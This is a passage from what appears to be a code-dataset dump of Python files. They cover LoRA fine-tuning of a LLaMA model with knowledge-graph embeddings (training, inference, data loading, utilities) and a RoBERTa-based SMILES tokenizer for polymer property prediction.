model = LlamaForCausalLM.from_pretrained(args.model_name_or_path, low_cpu_mem_usage=True, device_map='auto')
model = PeftModel.from_pretrained(model, args.checkpoint_dir)
llm_config = model.config
kge_embedding_dir = os.path.join(args.dataset, args.kge_model)
embed_model = EmbeddingModel(kge_embedding_dir, args.embedding_dim, 1024, llm_config.hidden_size, llm_config.hidden_act)
embed_model.load_state_dict(torch.load(os.path.join(os.path.dirname(args.checkpoint_dir), 'kge.bin'), map_location='cpu'))
model = KGELlama(tokenizer, model, embed_model)
model.cuda()
model.eval()
print_parameter_datatypes(model, logger)
# data
data_module = DataModule(args, tokenizer)
# inference
evaluator = Evaluator(args, tokenizer, model, data_module, generation_config)
preds = evaluator.eval_greedy(data_module.test_ds)
output = {
'args': vars(args),
'generation_config': vars(generation_config),
'prediction': preds,
}
output_path = os.path.join(os.path.dirname(args.checkpoint_dir), f'prediction.json')
json.dump(output, open(output_path, 'w', encoding='utf-8'), ensure_ascii=False, indent=4)
| 7,211 | Python | .py | 147 | 38.108844 | 130 | 0.619589 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,123 | utils.py | nju-websoft_DIFT/utils.py | from genericpath import isfile
import os
import json
import copy
import tqdm
import logging
import pandas as pd
import argparse
from typing import List, Optional, Dict, Sequence, Union
from dataclasses import dataclass, field
import bitsandbytes as bnb
import torch
import transformers
from transformers import (
AutoConfig, GenerationConfig,
AutoTokenizer, PreTrainedTokenizer,
AutoModelForCausalLM,
Seq2SeqTrainingArguments, Seq2SeqTrainer, HfArgumentParser,
set_seed,
Seq2SeqTrainer,
BitsAndBytesConfig,
LlamaTokenizer
)
from peft.tuners.lora import LoraLayer
from peft import LoraConfig, get_peft_model, PeftModelForCausalLM, prepare_model_for_kbit_training
from model import KGELlama
def find_all_linear_names(args, model):
if args.use_quant:
cls = bnb.nn.Linear4bit if args.bits == 4 else (bnb.nn.Linear8bitLt if args.bits == 8 else torch.nn.Linear)
else:
cls = torch.nn.Linear
lora_module_names = set()
for name, module in model.named_modules():
if isinstance(module, cls):
names = name.split('.')
lora_module_names.add(names[0] if len(names) == 1 else names[-1])
if 'lm_head' in lora_module_names: # needed for 16-bit
lora_module_names.remove('lm_head')
return list(lora_module_names)
def get_accelerate_model(args, config, pretrained_model_class):
# if we are in a distributed setting, we need to set the device map and max memory per device
device_map = 'auto' if os.environ.get('LOCAL_RANK') is None else {'': int(os.environ.get('LOCAL_RANK', '0'))}
print(f'Loading base model {args.model_name_or_path}...')
if args.use_quant:
compute_dtype = (torch.float16 if args.fp16 else (torch.bfloat16 if args.bf16 else torch.float32))
model = pretrained_model_class.from_pretrained(
args.model_name_or_path,
config=config,
load_in_4bit=args.bits == 4,
load_in_8bit=args.bits == 8,
device_map='auto',
quantization_config=BitsAndBytesConfig(
load_in_4bit=args.bits == 4,
load_in_8bit=args.bits == 8,
llm_int8_threshold=6.0,
llm_int8_has_fp16_weight=False,
bnb_4bit_compute_dtype=compute_dtype,
bnb_4bit_use_double_quant=args.double_quant,
bnb_4bit_quant_type=args.quant_type,
),
torch_dtype=(torch.float16 if args.fp16 else (torch.bfloat16 if args.bf16 else torch.float32)),
)
else:
model = pretrained_model_class.from_pretrained(
args.model_name_or_path,
config=config,
low_cpu_mem_usage=True,
device_map=device_map,
)
setattr(model, 'model_parallel', True)
setattr(model, 'is_parallelizable', True)
if not args.full_finetune:
model = prepare_model_for_kbit_training(model, use_gradient_checkpointing=args.use_quant)
print(f'Adding LoRA modules...')
config = LoraConfig(
r=args.lora_r,
lora_alpha=args.lora_alpha,
lora_dropout=args.lora_dropout,
bias="none",
task_type="CAUSAL_LM",
)
model = get_peft_model(model, config)
for name, module in model.named_modules():
if isinstance(module, LoraLayer):
if args.bf16:
module = module.to(torch.bfloat16)
if 'norm' in name:
module = module.to(torch.float32)
if 'lm_head' in name or 'embed_tokens' in name:
if hasattr(module, 'weight'):
if args.bf16 and module.weight.dtype == torch.float32:
module = module.to(torch.bfloat16)
return model
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
print('Saving PEFT checkpoint...')
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "adapter_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"checkpoint-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "adapter_model")
kwargs["model"].save_pretrained(peft_model_path)
for file_name in os.listdir(checkpoint_folder):
if 'kge' in file_name:
continue
file_path = os.path.join(checkpoint_folder, file_name)
if os.path.isfile(file_path):
os.remove(file_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
def on_train_end(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
def print_trainable_parameters(args, model, logger=None):
"""
Prints the number of trainable parameters in the model.
"""
trainable_params = 0
all_params = 0
for _, param in model.named_parameters():
all_params += param.numel()
if param.requires_grad:
trainable_params += param.numel()
if args.use_quant and args.bits == 4: trainable_params /= 2
trainable = round(100 * trainable_params / all_params, 3)
trainable_params = trainable_params//10**6
all_params = all_params//10**9
if logger is None:
print(f"trainable params: {trainable_params}MB || all params: {all_params}GB || trainable: {trainable}%")
else:
logger.info(f"trainable params: {trainable_params}MB || all params: {all_params}GB || trainable: {trainable}%")
def print_parameter_datatypes(model, logger=None):
dtypes = dict()
for _, p in model.named_parameters():
dtype = p.dtype
if dtype not in dtypes: dtypes[dtype] = 0
dtypes[dtype] += p.numel()
total = 0
for k, v in dtypes.items(): total += v
for k, v in dtypes.items():
if logger is None:
print(f'type: {k} || num: {v} || {round(v/total, 3)}')
else:
logger.info(f'type: {k} || num: {v} || {round(v/total, 3)}')
def get_logger(log_dir: str):
log_format = logging.Formatter("[%(asctime)s %(levelname)s] %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
log_file = os.path.join(log_dir, 'log.txt')
file_handler = logging.FileHandler(log_file)
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(log_format)
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
console_handler.setFormatter(log_format)
logger.addHandler(file_handler)
logger.addHandler(console_handler)
return logger | 6,680 | Python | .py | 157 | 34.515924 | 119 | 0.648557 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,124 | train.py | nju-websoft_DIFT/train.py | import os
import json
import copy
import tqdm
import pandas as pd
import argparse
from typing import List, Optional, Dict, Sequence
from dataclasses import dataclass, field
import bitsandbytes as bnb
import torch
from torch.nn.utils.rnn import pad_sequence
from datasets import load_dataset, Dataset
import transformers
from transformers import AutoConfig, GenerationConfig
from transformers import AutoTokenizer, PreTrainedTokenizer
from transformers import AutoModelForCausalLM, LlamaForCausalLM
from transformers import Seq2SeqTrainingArguments, Seq2SeqTrainer, HfArgumentParser
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
from transformers import (
set_seed,
Seq2SeqTrainer,
)
from arguments import ModelArguments, DataArguments, TrainingArguments, GenerationArguments
from data import DataModule, make_data_module
from model import EmbeddingModel, KGELlama
from utils import SavePeftModelCallback, print_trainable_parameters, print_parameter_datatypes, get_logger, get_accelerate_model
def train():
hfparser = HfArgumentParser((ModelArguments, DataArguments, TrainingArguments, GenerationArguments))
model_args, data_args, training_args, generation_args, _ = hfparser.parse_args_into_dataclasses(return_remaining_strings=True)
training_args.generation_config = GenerationConfig(**vars(generation_args))
args = argparse.Namespace(**vars(model_args), **vars(data_args), **vars(training_args))
assert args.model_class in ['LlamaForCausalLM', 'KGELlama']
if args.kge_model == 'TransE':
args.embedding_dim = 100
set_seed(args.seed)
os.makedirs(args.output_dir)
logger = get_logger(args.output_dir)
logger.info(vars(args))
tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, use_fast=False)
tokenizer.pad_token = tokenizer.eos_token
if args.model_class == 'KGELlama':
tokenizer.add_tokens(['[QUERY]', '[ENTITY]', '[RELATION]'])
model_config = AutoConfig.from_pretrained(args.model_name_or_path)
model = get_accelerate_model(args, model_config, LlamaForCausalLM)
model.config.use_cache = False
if args.model_class == 'KGELlama':
llm_config = model.config
kge_embedding_dir = os.path.join(args.dataset, args.kge_model)
embed_model = EmbeddingModel(kge_embedding_dir, args.embedding_dim, 1024, llm_config.hidden_size, llm_config.hidden_act)
model = KGELlama(tokenizer, model, embed_model)
# Verifying the datatypes and parameter counts before training.
print_trainable_parameters(args, model, logger)
print_parameter_datatypes(model, logger)
data_module = make_data_module(args, tokenizer, logger)
trainer = Seq2SeqTrainer(
model=model,
tokenizer=tokenizer,
args=training_args,
**data_module,
)
if not args.full_finetune:
trainer.add_callback(SavePeftModelCallback)
# Training
if args.do_train:
train_result = trainer.train()
metrics = train_result.metrics
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
if __name__ == '__main__':
train()
| 3,204 | Python | .py | 71 | 40.197183 | 130 | 0.754997 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,125 | model.py | nju-websoft_DIFT/model.py | import os
from typing import List, Optional, Dict, Sequence, Union
import torch
from torch import nn
from transformers import AutoTokenizer, LlamaForCausalLM, GenerationConfig
from transformers.activations import ACT2FN
from peft import PeftModel
class EmbeddingModel(nn.Module):
def __init__(
self,
embedding_dir: str,
input_size: int,
intermediate_size: int = 1024,
output_size: int = 4096,
hidden_act: str = 'silu',
) -> None:
super().__init__()
entity_embedding_path = os.path.join(embedding_dir, 'entity_embeddings.pt')
query_embedding_path = os.path.join(embedding_dir, 'query_embeddings.pt')
entity_embeddings = torch.load(entity_embedding_path)
entity_embeddings.requires_grad = False
self.ent_embeddings = nn.Embedding.from_pretrained(entity_embeddings)
query_embeddings = torch.load(query_embedding_path)
query_embeddings.requires_grad = False
self.query_embeddings = nn.Embedding.from_pretrained(query_embeddings)
self.adapter = nn.Sequential(
nn.Linear(in_features=input_size, out_features=intermediate_size, bias=False),
ACT2FN[hidden_act],
nn.Linear(in_features=intermediate_size, out_features=output_size, bias=False),
)
for layer in self.adapter:
if isinstance(layer, nn.Linear):
torch.nn.init.xavier_uniform_(layer.weight)
# torch.nn.init.xavier_normal_(layer.weight)
def forward(self, query_ids, entity_ids):
"""
Args:
query_ids: (batch_size, )
entity_ids: (batch_size * K, )
Returns:
query_embeds: (batch_size, hidden_size)
entity_embeds: (batch_size * K, hidden_size)
"""
query_embeds = self.adapter(self.query_embeddings(query_ids))
entity_embeds = self.adapter(self.ent_embeddings(entity_ids))
return query_embeds, entity_embeds
class KGELlama(nn.Module):
def __init__(
self,
tokenizer: AutoTokenizer,
llama_model: Union[LlamaForCausalLM, PeftModel],
kge_model: EmbeddingModel,
):
super().__init__()
self.tokenizer = tokenizer
self.llama_model = llama_model
self.kge_model = kge_model
def forward(
self,
input_ids: torch.LongTensor = None,
attention_mask: Optional[torch.Tensor] = None,
labels: Optional[torch.LongTensor] = None,
query_ids: Optional[torch.LongTensor] = None,
entity_ids: Optional[torch.LongTensor] = None,
):
"""
Args:
input_ids: (batch_size, seq_len)
attention_mask: (batch_size, seq_len)
labels: (batch_size, seq_len)
query_ids: (batch_size, )
entity_ids: (batch_size, K)
"""
query_holder = self.tokenizer.convert_tokens_to_ids(['[QUERY]'])[0]
entity_holder = self.tokenizer.convert_tokens_to_ids(['[ENTITY]'])[0]
query_position = torch.nonzero(input_ids == query_holder) # (batch_size, 2)
entity_position = torch.nonzero(input_ids == entity_holder) # (batch_size*K, 2)
query_embeds, entity_embeds = self.kge_model(query_ids, entity_ids.view(-1))
input_ids[input_ids == query_holder] = self.tokenizer.pad_token_id
input_ids[input_ids == entity_holder] = self.tokenizer.pad_token_id
inputs_embeds = self.llama_model.model.model.embed_tokens(input_ids).clone()
inputs_embeds[query_position[:, 0], query_position[:, 1]] = query_embeds
inputs_embeds[entity_position[:, 0], entity_position[:, 1]] = entity_embeds
return self.llama_model(
inputs_embeds=inputs_embeds,
attention_mask=attention_mask,
labels=labels,
)
def save_pretrained(self, peft_model_path):
self.llama_model.save_pretrained(peft_model_path)
torch.save(self.kge_model.state_dict(), os.path.join(os.path.dirname(peft_model_path), 'kge.bin'))
def generate(
self,
input_ids: torch.LongTensor,
query_ids: torch.LongTensor,
entity_ids: torch.LongTensor,
generation_config: GenerationConfig
):
query_holder = self.tokenizer.convert_tokens_to_ids(['[QUERY]'])[0]
entity_holder = self.tokenizer.convert_tokens_to_ids(['[ENTITY]'])[0]
query_position = torch.nonzero(input_ids == query_holder) # (batch_size, 2)
entity_position = torch.nonzero(input_ids == entity_holder) # (batch_size*K, 2)
query_embeds, entity_embeds = self.kge_model(query_ids, entity_ids.view(-1))
input_ids[input_ids == query_holder] = self.tokenizer.pad_token_id
input_ids[input_ids == entity_holder] = self.tokenizer.pad_token_id
inputs_embeds = self.llama_model.model.model.embed_tokens(input_ids).clone()
inputs_embeds[query_position[:, 0], query_position[:, 1]] = query_embeds
inputs_embeds[entity_position[:, 0], entity_position[:, 1]] = entity_embeds
return self.llama_model.generate(
inputs_embeds=inputs_embeds,
generation_config=generation_config,
) | 5,283 | Python | .py | 112 | 37.633929 | 106 | 0.635476 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,126 | data.py | nju-websoft_DIFT/data.py | import os
import json
import copy
import random
import pandas as pd
from queue import Queue
from typing import List, Optional, Dict, Sequence
from dataclasses import dataclass, field
import bitsandbytes as bnb
import torch
from torch.nn.utils.rnn import pad_sequence
# from torch.utils.data import Dataset, DataLoader
from datasets import load_dataset, Dataset
import transformers
IGNORE_INDEX = -100
class KGDataset(torch.utils.data.Dataset):
def __init__(self, examples):
self.data = examples
self.len = len(self.data)
def __len__(self):
return self.len
def __getitem__(self, idx) -> List:
return self.data[idx]
class DataModule:
def __init__(self, args, tokenizer: transformers.PreTrainedTokenizer, logger=None) -> None:
self.args = args
self.tokenizer = tokenizer
train_examples = json.load(open(args.train_path, 'r', encoding='utf-8'))
eval_examples = json.load(open(args.eval_path, 'r', encoding='utf-8'))
test_examples = json.load(open(args.test_path, 'r', encoding='utf-8'))
self.train_ds = KGDataset(train_examples)
self.eval_ds = KGDataset(eval_examples)
self.test_ds = KGDataset(test_examples)
@dataclass
class KGDataCollator:
args: None
tokenizer: transformers.PreTrainedTokenizer
source_max_len: int
target_max_len: int
def __call__(self, instances: Sequence[Dict]) -> Dict[str, torch.Tensor]:
# Extract elements
sources = [f"{self.tokenizer.bos_token} {example['input']}" for example in instances]
targets = [f"{example['output']} {self.tokenizer.eos_token}" for example in instances]
# Tokenize
tokenized_sources_with_prompt = self.tokenizer(
sources,
max_length=self.source_max_len,
truncation=True,
add_special_tokens=False,
)
tokenized_targets = self.tokenizer(
targets,
max_length=self.target_max_len,
truncation=True,
add_special_tokens=False,
)
source_input_ids = tokenized_sources_with_prompt['input_ids']
target_input_ids = tokenized_targets['input_ids']
# Build the input and labels for causal LM
input_ids = []
labels = []
for tokenized_source, tokenized_target in zip(source_input_ids, target_input_ids):
input_ids.append(
torch.tensor(tokenized_source + tokenized_target)
)
labels.append(
torch.tensor([IGNORE_INDEX for _ in range(len(tokenized_source))] + copy.deepcopy(tokenized_target))
)
# Apply padding
input_ids = pad_sequence(input_ids, batch_first=True, padding_value=self.tokenizer.pad_token_id)
labels = pad_sequence(labels, batch_first=True, padding_value=IGNORE_INDEX)
data_dict = {
'input_ids': input_ids,
'attention_mask':input_ids.ne(self.tokenizer.pad_token_id),
'labels': labels,
}
# Add entity idxs to access the KGE model
if self.args.model_class == 'KGELlama':
data_dict['query_ids'] = torch.LongTensor([example['query_id'] for example in instances])
data_dict['entity_ids'] = torch.LongTensor(
[example['entity_ids'] for example in instances]
)
return data_dict
def make_data_module(args, tokenizer: transformers.PreTrainedTokenizer, logger=None) -> Dict:
data_module = DataModule(args, tokenizer, logger)
data_collator = KGDataCollator(
args=args, tokenizer=tokenizer,
source_max_len=args.source_max_len, target_max_len=args.target_max_len
)
return {
'train_dataset': data_module.train_ds,
'eval_dataset': data_module.eval_ds,
'data_collator': data_collator,
}
| 3,878 | Python | .py | 94 | 33.148936 | 116 | 0.65004 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,127 | get_prediction_results.py | FanmengWang_MMPolymer/get_prediction_results.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import csv
import shutil
import pickle
import lmdb
import subprocess
import torch
import argparse
import pandas as pd
import numpy as np
from rdkit import Chem
from tqdm import tqdm
from rdkit import RDLogger
from rdkit.Chem import AllChem
from rdkit.Chem.Scaffolds import MurckoScaffold
import warnings
warnings.filterwarnings(action='ignore')
from multiprocessing import Pool
import json
import os
from functools import lru_cache
from typing import List, Optional, Tuple
import regex as re
from transformers import AddedToken, PreTrainedTokenizer
import logging
from transformers import RobertaTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/vocab.json",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/vocab.json",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/vocab.json",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/vocab.json",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/vocab.json",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/vocab.json",
},
"merges_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/merges.txt",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/merges.txt",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/merges.txt",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/merges.txt",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/merges.txt",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"roberta-base": 512,
"roberta-large": 512,
"roberta-large-mnli": 512,
"distilroberta-base": 512,
"roberta-base-openai-detector": 512,
"roberta-large-openai-detector": 512,
}
@lru_cache()
def bytes_to_unicode():
"""
Returns list of utf-8 byte and a mapping to unicode strings. We specifically avoids mapping to whitespace/control
characters the bpe code barfs on.
The reversible bpe codes work on unicode strings. This means you need a large # of unicode characters in your vocab
if you want to avoid UNKs. When you're at something like a 10B token dataset you end up needing around 5K for
decent coverage. This is a significant percentage of your normal, say, 32K bpe vocab. To avoid that, we want lookup
tables between utf-8 bytes and unicode strings.
"""
bs = (
list(range(ord("!"), ord("~") + 1)) + list(range(ord("¡"), ord("¬") + 1)) + list(range(ord("®"), ord("ÿ") + 1))
)
cs = bs[:]
n = 0
for b in range(2**8):
if b not in bs:
bs.append(b)
cs.append(2**8 + n)
n += 1
cs = [chr(n) for n in cs]
return dict(zip(bs, cs))
def get_pairs(word):
"""
Return set of symbol pairs in a word.
Word is represented as tuple of symbols (symbols being variable-length strings).
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
class PolymerSmilesTokenizer(PreTrainedTokenizer):
"""Adapt Roberta Tokenizer to PolymerSmilesTokenzier"""
"""
Original Comments:
Constructs a RoBERTa tokenizer, derived from the GPT-2 tokenizer, using byte-level Byte-Pair-Encoding.
This tokenizer has been trained to treat spaces like parts of the tokens (a bit like sentencepiece) so a word will
be encoded differently whether it is at the beginning of the sentence (without space) or not:
```
#>>> from transformers import RobertaTokenizer
#>>> tokenizer = RobertaTokenizer.from_pretrained("roberta-base")
#>>> tokenizer("Hello world")['input_ids']
[0, 31414, 232, 328, 2]
#>>> tokenizer(" Hello world")['input_ids']
[0, 20920, 232, 2]
```
You can get around that behavior by passing `add_prefix_space=True` when instantiating this tokenizer or when you
call it on some text, but since the model was not pretrained this way, it might yield a decrease in performance.
<Tip>
When used with `is_split_into_words=True`, this tokenizer will add a space before each word (even the first one).
</Tip>
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
Whether or not to add an initial space to the input. This allows to treat the leading word just as any
other word. (RoBERTa tokenizer detect beginning of words by the preceding space).
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(
self,
vocab_file,
merges_file,
errors="replace",
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
add_prefix_space=False,
**kwargs
):
bos_token = AddedToken(bos_token, lstrip=False, rstrip=False) if isinstance(bos_token, str) else bos_token
eos_token = AddedToken(eos_token, lstrip=False, rstrip=False) if isinstance(eos_token, str) else eos_token
sep_token = AddedToken(sep_token, lstrip=False, rstrip=False) if isinstance(sep_token, str) else sep_token
cls_token = AddedToken(cls_token, lstrip=False, rstrip=False) if isinstance(cls_token, str) else cls_token
unk_token = AddedToken(unk_token, lstrip=False, rstrip=False) if isinstance(unk_token, str) else unk_token
pad_token = AddedToken(pad_token, lstrip=False, rstrip=False) if isinstance(pad_token, str) else pad_token
# Mask token behave like a normal word, i.e. include the space before it
mask_token = AddedToken(mask_token, lstrip=True, rstrip=False) if isinstance(mask_token, str) else mask_token
super().__init__(
errors=errors,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
cls_token=cls_token,
pad_token=pad_token,
mask_token=mask_token,
add_prefix_space=add_prefix_space,
**kwargs,
)
with open(vocab_file, encoding="utf-8") as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for k, v in self.encoder.items()}
self.errors = errors # how to handle errors in decoding
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
bpe_merges = merges_handle.read().split("\n")[1:-1]
bpe_merges = [tuple(merge.split()) for merge in bpe_merges]
self.bpe_ranks = dict(zip(bpe_merges, range(len(bpe_merges))))
self.cache = {}
self.add_prefix_space = add_prefix_space
# Should have added re.IGNORECASE so BPE merges can happen for capitalized versions of contractions
"""Regex for SMILES"""
smi_regex_pattern = r"(\-?[0-9]+\.?[0-9]*|\[|\]|SELF|Li|Be|Na|Mg|Al|K|Ca|Co|Zn|Ga|Ge|As|Se|Sn|Te|N|O|P|H|I|b|c|n|o|s|p|Br?|Cl?|Fe?|Ni?|Si?|\||\(|\)|\^|=|#|-|\+|\\|\/|@|\*|\.|\%|\$)"
self.pat = re.compile(smi_regex_pattern)
@property
def vocab_size(self):
return len(self.encoder)
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token)
pairs = get_pairs(word)
if not pairs:
return token
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
self.cache[token] = word
return word
def _tokenize(self, text):
"""Tokenize a string."""
bpe_tokens = []
for token in re.findall(self.pat, text):
token = "".join(
self.byte_encoder[b] for b in token.encode("utf-8")
) # Maps all our bytes to unicode strings, avoiding control tokens of the BPE (spaces in our case)
bpe_tokens.extend(bpe_token for bpe_token in self.bpe(token).split(" "))
return bpe_tokens
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index)
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
text = "".join(tokens)
text = bytearray([self.byte_decoder[c] for c in text]).decode("utf-8", errors=self.errors)
return text
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write("#version: 0.2\n")
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return vocab_file, merge_file
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A RoBERTa sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s></s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not
make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def prepare_for_tokenization(self, text, is_split_into_words=False, **kwargs):
add_prefix_space = kwargs.pop("add_prefix_space", self.add_prefix_space)
if (is_split_into_words or add_prefix_space) and (len(text) > 0 and not text[0].isspace()):
text = " " + text
return (text, kwargs)
def smi2scaffold(smi):
try:
